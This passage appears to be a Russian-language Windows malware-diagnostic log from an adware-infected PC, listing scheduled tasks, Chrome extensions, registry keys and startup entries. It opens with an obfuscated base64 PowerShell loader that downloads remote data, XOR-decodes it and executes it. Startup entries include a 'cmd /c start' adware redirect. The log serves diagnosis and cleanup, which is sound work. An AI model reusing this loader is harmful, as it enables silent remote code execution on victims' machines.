B2AHMARwB2AHUAbABfAEcAUABtAFYAcwBZAEEAaQBJADEAdQBTAHgAMQAtAEQAbgB5AGgAbgBMAGIAMwBWAHkAegBwAFcAcABRADMAMwAxAEIAcABqAE0AcwB5ADMAZQBPAGMAcABNAFgASwBPAHgAUgBEADUAdQBXADcARQBFAE0ASwAwAHAAdgBEADMASgBuAEYAQgA0AGgAOQB3AGkASgBCAE8AQQBLAEEAagBmAE8AQwAyAEMASQBvADUAcAA3AFcAdQBfAFYAZgBqAHoAVQBkAEoAMgBTAHgATAA1ADUAeABfAFkAYQB2AGkAdABNAFMAJgBjAD0ANwB6ADUAWAA0AHcAcgB3AFoAUgBwAHkAWQB5AHEAMwBRAE8ALQBCAG4AMgBDAGEAeQBhAC0AUwA3AHMARAAxAHcATQBDAG8AdQBqAHYANABhADUAQgBfADAARQAtAFMAMwBCAGUAYgBvAHEAcQBCAG0AaABkADYARQBvAHEARQAzAHMAdgBiAHMANgBBAGIAeQBfAGYATAAyAGcAbgBIADMARAA0AEkAQQBNAGgALQBKADIAQwBxAEUAYwB0AHIAVQAxAEEAYgA2ADgALQBNAG0AZAAwAG0AZwBBAGoAcABjAG0ARgBfADMAcABEAEoAaQBEADAAMgBHADYAdgB2AGcAYQBYADcAdQB1AFoAagBCAHAAOQBYAFIATABYAGMANgB5ADUAegBKAEUAQgBpAG4AMQBSAGsAbgAyAGgARQBqAEUASABOAGUAeQBJAG0AMgB4ADQASAAxAGYAZwB6AHYANwBRAEoAYgA3AFMAZgAwAGMAegBmAG4AZgBWAHkAVABFAC0AbwB0AHAAUwA0ADIAbQBVADIARQBGAE4ANwByAFAATQBCADEARgBaAEoAagBQADQAdQBBAFIANAA4AFoAQwAyAFoAZQAtAC0AcABKAHMAbwBjADcAXwBYAHYAeABuAHQAZABjAE0AdgBFAG0AcgBVAFcAZgBjAEUAVABDADIAUgBmAFYANgB1AFEAeAA4ADUAawBqAFAAMQBIADMAUQBnAHoAdQBYAHIAYwBZAEQAaABlAEQAQQB5AG0ANAB5AGUAMQB2AHAAUQBJADUAOABPAG8ALQAzADUAaQBoAGIASQBiAGcAQwBiAEIAYgBXAEgAMQBfADYAcwBRAHYAUwBvAHEAUgBYAEYARwBSADAAVQBSAG0AOQBCAEMAZwBjAEMAQwBVAEMAdwBFAEcATwAtAFoARwBpAHAAbgA0AHkANABZAEoAdgByAHYAYgBJAEgAZQBUAEsATAAwAF8AZgA3ADcATABPAHEANwBfAFYAYwBjAFcAegB1AFUAZgBNAGoAUwBoAGkAbgBDAGIAZgBmAGYASgBJAHoAYgB1AGsAZgBsAGsAbABrAFAAcQBXAFMAUgB2AEcATQBjAEUAMwBXADkANwBCAFAAcwBXAHUAYgB3AGMASQBSAHMARQBtAEwAQQBMAGsAbQBkAEcAVwBEADkAMQBYAEQAOQBSAF8AdwBhAHgARgBnAEkARgB2ADMAdwBjAHIATAA1ADEAbwBjAFkARgBNAFYAOABoAFgARgBMAHgAdwBfAFMAUQBJAHMAOQBFAFUASABFAGQAZABrAHQAWQBVAGQAaAA1AEYAUABrAFUAYwBhAEYAeQA4AGkAcABxADMANgB2ADQASABaAGUAVwBYAHIAawBYAHEAbgB2AGcASgB1ADkAWgBJADEAYQBOADYAWgB4AGUANQBLADAAZgAyAHEAWgBfAGIAVAAxADcANwBtADUAbgBpAHYAOABTAFEAOABYADIARgBrAEMAbwBfAFAAMgBBAEUAUwA5AEEAWQBBAF8AOQA1AEUANwBUAEkANgBBAE8ASAA4AF8ASQB3AEEAZQBPAEIARABYAHMAcgB3AEUAZgBkADkAUgBwADQAOQBwAGEAeQBPADcAdwAyAGsAVgBJAE0AZwBjAGIAYwByAFcAZgBfAE0AaABGADUAWABvAGMAdQBTADEAZgByAGoAYgBEAC0AWABPAGMAcAA4AHcAZQAxAGUAMwAtAE0AdwBmAFcAZABKAFgAdAA2AGEAMwB3AGoARwB6AEEAbQBmAFcAaQBIADgATQBxAHYATABaAFoANgBfAEgAbQBSADEAZgB4AF8AcwA3AE0AdgBhAEwAZwBjADIAagBBAFEANQBhAFQATwA2AEwAVwBYAFUASQBmAHAAUAB3ADQAdwA4AHQAegBfADEAZABSAG0ASQBwAGsASQB0AG0AZAB4AFMASQBfAHYATABBAEYAbwB0AHQATABFAFMASQB3ADYAbQBuAEMAVQBLAE0ATwBNAGYASAB6AEsAdQBkAE4AdABSAFMAMQBBAFcAeABvAGcATwA1AEcAeQBsADcANAAxAHUAVQBIADEASwBQAHEAWgBnAHAAdABLAFMAUgBOAGQAMABfADMASgA2AEkAcgAzAGIATQBFAGEAbQAwAEwAbABPAGMAUwBxAHgANQBjAHUAdABVAHQAUQBMAG8AVgBiAFMAZwB0AFQAZgBfAGMAdgB6AE0ATwBTAFUAVABFAF8AVQBTAFgAYQAtAGQAWQBRAFYAYgBQAGUASwBlAEEAVgBCAE8AUQBUAFIAcwBYAGoALQBqAFUAOABmAHMAdwBHAEEAOAB6AGUARwBrADcANgBBADcATwBrAFYATQB2AHAANQBqAFUAcQBEAE0ASQBCAG0ARQBjAFIAYQBEAFYANQBvAHgAOABFAGYAJgByAD0ANAA4ADQAMAA2ADIAMgAyADMANQA0ADkAMwA0ADYANAAwADIAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQQAwAEIAMABCADQANwAtADcARAAwAEEALQAwAEQANwBEAC0AMABCADEAMQAtADcARQA3AEQAMABGADAAQQAxADEAMABBAH0AIgA7ACQAcAByAGkAZAA9ACIAUwB5AHMAdABlAG0ASABlAGEAbABlAHIAIgA7ACQAaQBuAGkAZAA9ACIASQBKAEgASQBNAEwAUgBJACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
C:\Windows\system32\tasks\Microsoft\Windows Defender\MP Scheduled Scan - c:\program files\windows defender\MpCmdRun.exe Scan -ScheduleJob -WinTask -RestrictPrivilegesScan
C:\Windows\system32\tasks\Microsoft\Windows\WindowsBackup\ConfigNotification - %systemroot%\System32\sdclt.exe /CONFIGNOTIFICATION
C:\Windows\system32\tasks\Microsoft\Windows\Windows Media Sharing\UpdateLibrary - "%ProgramFiles%\Windows Media Player\wmpnscfg.exe" 
C:\Windows\system32\tasks\Microsoft\Windows\Windows Filtering Platform\BfeOnServiceStartTypeChange - %windir%\system32\rundll32.exe bfe.dll,BfeOnServiceStartTypeChange
C:\Windows\system32\tasks\Microsoft\Windows\Windows Error Reporting\QueueReporting - %windir%\system32\wermgr.exe -queuereporting
C:\Windows\system32\tasks\Microsoft\Windows\UPnP\UPnPHostConfig - sc.exe config upnphost start= auto
C:\Windows\system32\tasks\Microsoft\Windows\Time Synchronization\SynchronizeTime - %windir%\system32\sc.exe start w32time task_started
C:\Windows\system32\tasks\Microsoft\Windows\Tcpip\IpAddressConflict1 - %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPOffendingSystem
C:\Windows\system32\tasks\Microsoft\Windows\Tcpip\IpAddressConflict2 - %windir%\system32\rundll32.exe ndfapi.dll,NdfRunDllDuplicateIPDefendingSystem
C:\Windows\system32\tasks\Microsoft\Windows\SystemRestore\SR - %windir%\system32\rundll32.exe /d srrstr.dll,ExecuteScheduledSPPCreation
C:\Windows\system32\tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask - sc.exe start sppsvc
C:\Windows\system32\tasks\Microsoft\Windows\RemoteAssistance\RemoteAssistanceTask - %windir%\system32\RAServer.exe /offerraupdate
C:\Windows\system32\tasks\Microsoft\Windows\Power Efficiency Diagnostics\AnalyzeSystem - %SystemRoot%\System32\powercfg.exe -energy -auto
C:\Windows\system32\tasks\Microsoft\Windows\NetTrace\GatherNetworkInfo - %windir%\system32\gatherNetworkInfo.vbs 
C:\Windows\system32\tasks\Microsoft\Windows\MUI\LPRemove - %windir%\system32\lpremove.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch - %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService - %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks - %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ehDRMInit - %SystemRoot%\ehome\ehPrivJob.exe /DRMInit
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\InstallPlayReady - %SystemRoot%\ehome\ehPrivJob.exe /InstallPlayReady $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\mcupdate - %SystemRoot%\ehome\mcupdate $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\mcupdate_scheduled - %SystemRoot%\ehome\mcupdate -crl -hms -pscn 15
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -MediaCenterRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -ObjectStoreRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\OCURActivate - %SystemRoot%\ehome\ehPrivJob.exe /OCURActivate
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\OCURDiscovery - %SystemRoot%\ehome\ehPrivJob.exe /OCURDiscovery $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscovery - %SystemRoot%\ehome\ehPrivJob.exe /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 - %SystemRoot%\ehome\ehPrivJob.exe /wait:7 /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 - %SystemRoot%\ehome\ehPrivJob.exe /wait:90 /PBDADiscovery
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PeriodicScanRetry - %windir%\ehome\MCUpdate.exe -pscn 0
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PvrRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -PvrRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\PvrScheduleTask - %SystemRoot%\ehome\mcupdate.exe -PvrSchedule
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\RecordingRestart - %SystemRoot%\ehome\ehrec /RestartRecording
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\RegisterSearch - %SystemRoot%\ehome\ehPrivJob.exe /DoRegisterSearch $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\ReindexSearchRoot - %SystemRoot%\ehome\ehPrivJob.exe /DoReindexSearchRoot
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask - %SystemRoot%\ehome\mcupdate.exe -SqlLiteRecoveryTask
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\StartRecording - %SystemRoot%\ehome\ehrec /StartRecording
C:\Windows\system32\tasks\Microsoft\Windows\Media Center\UpdateRecordPath - %SystemRoot%\ehome\ehPrivJob.exe /DoUpdateRecordPath $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Location\Notifications - %windir%\System32\LocationNotifications.exe 
C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector - %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
C:\Windows\system32\tasks\Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver - %windir%\system32\DFDWiz.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Defrag\ScheduledDefrag - %windir%\system32\defrag.exe -c
C:\Windows\system32\tasks\Microsoft\Windows\Customer Experience Improvement Program\Consolidator - %SystemRoot%\System32\wsqmcons.exe 
C:\Windows\system32\tasks\Microsoft\Windows\Bluetooth\UninstallDeviceTask - BthUdTask.exe $(Arg0)
C:\Windows\system32\tasks\Microsoft\Windows\Autochk\Proxy - %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\AitAgent - aitagent 
C:\Windows\system32\tasks\Microsoft\Windows\Application Experience\ProgramDataUpdater - %windir%\system32\rundll32.exe aepdu.dll,AePduRunUpdate
C:\Windows\system32\tasks\Microsoft\Windows\AppID\PolicyConverter - %windir%\system32\appidpolicyconverter.exe 
C:\Windows\system32\tasks\Microsoft\Windows\AppID\VerifiedPublisherCertStoreCheck - %windir%\system32\appidcertstorecheck.exe 

=========Google Chrome=========

C:\Users\Владислав\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences
Extension ahfgeienlihckogmohjhadlkjgocpleb 1 Интернет-магазин Chrome 0.2
Extension bepbmhgboaologfdajaanbcjmnhjmhfn 0  
Extension bfchgcbmheebfgccmphpabmjmiphgafa 1  
Extension bgcifljfapbhgiehkjlckfjmgeojijcb 1 Поиск Mail.Ru 7.0.2
Extension bgknpfancpeamejmcooedljjnaddldhg 0 Домашняя страница Mail.Ru 2.0.1
Extension blpcfgokakmgnkcojhhkbfbldkacnbeo 1 YouTube 4.2.8
Extension coobgpohoikkiipiblmjeljniedjpjpf 1 Google Search 0.0.0.60
Extension dkekdlkmdpipihonapoleopfekmapadh 0 Стартовая — Яндекс 1.2.9.2
Extension eemcgdkfndhakfknompkggombfjjjeno 1 Bookmark Manager 0.1
Extension ehloibeiaffhibffchiobihgcainmcep 1  
Extension eioddfaepdoeifbhjphfefgipcjcdieo 1 Поиск Mail.Ru 7.0.2
Extension ennkphjdgehloodpbhlhldgbnhmacadg 1 Settings 0.2
Extension fdjdjkkjoiomafnihnobkinnfjnnlhdg 0 Советник Яндекс.Маркета 3.1.3.91
Extension fmgncofpadimjlpmndcpcfiilplihmop 1  
Extension geklbcigmpeljogplgbgnakkbajkkmbb 1  
Extension gfdkimpbcpahaombhbimeihdjnejgicl 1 Feedback 1.0
Extension ginepjojjbmfbfiibfdebddmbkjmgfle 1  
Extension gndaciceccgapjhpniecknjlmmlanaem 0 Визуальные Закладки Mail.Ru 2.0.1
Extension hgnpdbanhfmmdgeogllhocdajiphlkgi 1  
Extension ibgbdgngjflpkahkoabmiijlaggkinaj 1  
Extension iflppbjnpneiigcbdfjpnkebidmkjmoi 1 Визуальные Закладки Mail.Ru 5.0.1
Extension kmendfapggjehodndflmmgagdbamhnfd 1 CryptoTokenExtension 0.9.22
Extension lanabbpahpjnaljebnpgkjemcbkepiak 0 Поиск Mail.Ru 2.0.2
Extension lbjjfiihgfegniolckphpnfaokdkbmdm 1 Домашняя страница Mail.Ru 7.0.1
Extension lccekmodgklaepjeofjdjpbminllajkg 1 Chrome Hotword Shared Module 0.3.0.5
Extension lifbcibllhkdhoafpjfnlhfpfgnpldfl 0 Skype 8.0.0.9098
Extension lojpenhmoajbiciapkjkiekmobleogjc 1 Default Placeholder Extensions 35.2.1
Extension maogheekjnedndkikdmhdbacchlinogh 1 Media Saver 361.0.3.70
Extension mfehgcgbbipciphmccgaenjidiccnmng 1 Cloud Print 0.1
Extension mgndgikekgjfcpckkfioiadnlibdjbkf 1 Chrome 0.1
Extension mhjfbmdgcfjbbpaeojofohoefgiehjai 1 Chrome PDF Viewer 1
Extension mmebmmnpohfhoknnlpohjaembcipocaa 1  
Extension nbpagnldghgfoolbancepceaanlmhfmd 1 Hotword triggering 0.0.1.4
Extension neajdppkdcdipfabeoofebfddakdcjhd 1 Google Network Speech 1.0
Extension necfmkplpminfjagblfabggomdpaakan 0 Поиск  Яндексa 1.2.6.3
Extension nkeimhogjdpnpccoofpliimaahmaaome 1 Google+ Hangouts 1.0
Extension nmbfljkmcghmakofbhhgemjhboabdkcn 1  
Extension nmmhkkegccagdldgiimedpiccmgmieda 1 Платежная система Интернет-магазина Chrome 0.1.2.0
Extension oglbnjemojcfoedkaaonhbgcdmflhipf 1 Поиск по торрентам 361.0.0.65
Extension pafkbggdmjlpgkdkcbjmhmfcdpncadgh 1 Google Now 1.2.0.1
Extension pfigaoamnncijbgomifamkmkidnnlikl 0 Поиск и стартовая  – Яндекс 1.2.6.1
Extension pjkljhegncpnkpknbcohdijeoejaedia 1 Gmail 8.1
Extension ppoilmfkbpckodoifdlkmkepcajfjmhl 1 Домашняя страница Mail.Ru 7.0.1
Homepage: http://mail.ru/cnt/10445?gp=820031
default_search_provider.search_url: 
C:\Users\Владислав\AppData\Local\Google\Chrome\User Data\Default\Preferences
Homepage: 
default_search_provider.search_url: 

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgcifljfapbhgiehkjlckfjmgeojijcb]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bgknpfancpeamejmcooedljjnaddldhg]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dkekdlkmdpipihonapoleopfekmapadh]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\eioddfaepdoeifbhjphfefgipcjcdieo]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\fdjdjkkjoiomafnihnobkinnfjnnlhdg]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\gndaciceccgapjhpniecknjlmmlanaem]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\iflppbjnpneiigcbdfjpnkebidmkjmoi]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lanabbpahpjnaljebnpgkjemcbkepiak]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lbjjfiihgfegniolckphpnfaokdkbmdm]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl]
"Path"=C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\necfmkplpminfjagblfabggomdpaakan]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\pfigaoamnncijbgomifamkmkidnnlikl]
"Path"=

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ppoilmfkbpckodoifdlkmkepcajfjmhl]
"Path"=


======Снимок реестра======


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC


[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes]
"DefaultScope"={0633EE93-D776-472f-A0FF-E1416B8B2E3A}
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"URL"=http://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{12E8A6C2-B125-479F-AB3C-13B8757C7F04}]
MSaver

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08 2134656]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{12E8A6C2-B125-479F-AB3C-13B8757C7F04}]

[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{AE805869-2E5C-4ED4-8F7B-F1F7851A4497}]
Skype Click to Call for Internet Explorer - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08 1725056]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"Skype"=C:\Program Files (x86)\Skype\Phone\Skype.exe [2015-08-07 53722224]
"GenieFloater"=C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\baidusdTray]
C:\Program Files (x86)\BaiduSd3.0\BaiduSd\3.0.0.4605\baidusdTray.exe  -stmd=3 []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\BlueStacks Agent]
C:\Program Files (x86)\BlueStacks\HD-Agent.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Browser Manager]
C:\Users\Владислав\AppData\Local\Yandex\BrowserManager\BrowserManager.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Daemon]
C:\Users\Владислав\AppData\Roaming\daemon2.exe [2016-01-18 170672]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GameXP AccessPoint]
C:\GameXP\AccessPoint\accesspoint.exe -silent []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GenieFloater]
C:\Program Files (x86)\Genie Soft\Genie Cleaner\GenieFloater.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GetGoDM]
C:\Program Files (x86)\GetGo Software\GetGo Download Manager\GetGo.exe /minimized: []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Google Update]
C:\Users\Владислав\AppData\Local\Google\Update\GoogleUpdate.exe /c []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\GoogleChromeAutoLaunch_203FD1B6B4F492A0A8A984C446590D7B]
C:\Program Files (x86)\Crossbrowse\Crossbrowse\Application\crossbrowse.exe --no-startup-window []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\KometaAutoLaunch_A038D26498222E3AF0B26AC6E0272F6A]
C:\Users\Владислав\AppData\Local\Kometa\Application\kometa.exe --no-startup-window []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Muzbaza]
C:\Program Files (x86)\Muzabaza\Muzabaza player\Muzabaza.exe [2013-11-12 1876480]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SunJavaUpdateSched]
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2014-03-18 224128]

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Yahoo! Search]
C:\Program Files (x86)\Pay-By-Ads\Yahoo! Search\1.3.26.12\dsrlte.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\YandexElements]
C:\Users\Владислав\AppData\Local\Yandex\Elements\elements.exe\8.7.0.3110\elements64.exe /auto []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ZetaGamesNews]
C:\Users\Владислав\AppData\Local\ZetaGamesNews\zeta.exe []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\ZetaGamesViewer]
C:\Users\Владислав\AppData\Local\ZetaGamesViewer\zetaviewer.exe --show-hidden []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\zgtqkznlfp]
cmd /c start http://nilavets.ru/?utm_source=uoua03&utm_content=269102ffd6df900960deb96339e07c3b []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Zona]
C:\Program Files (x86)\Zona\Zona.exe /MINIMIZED []

[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^WebBrowserMixVideoPlayer.lnk]
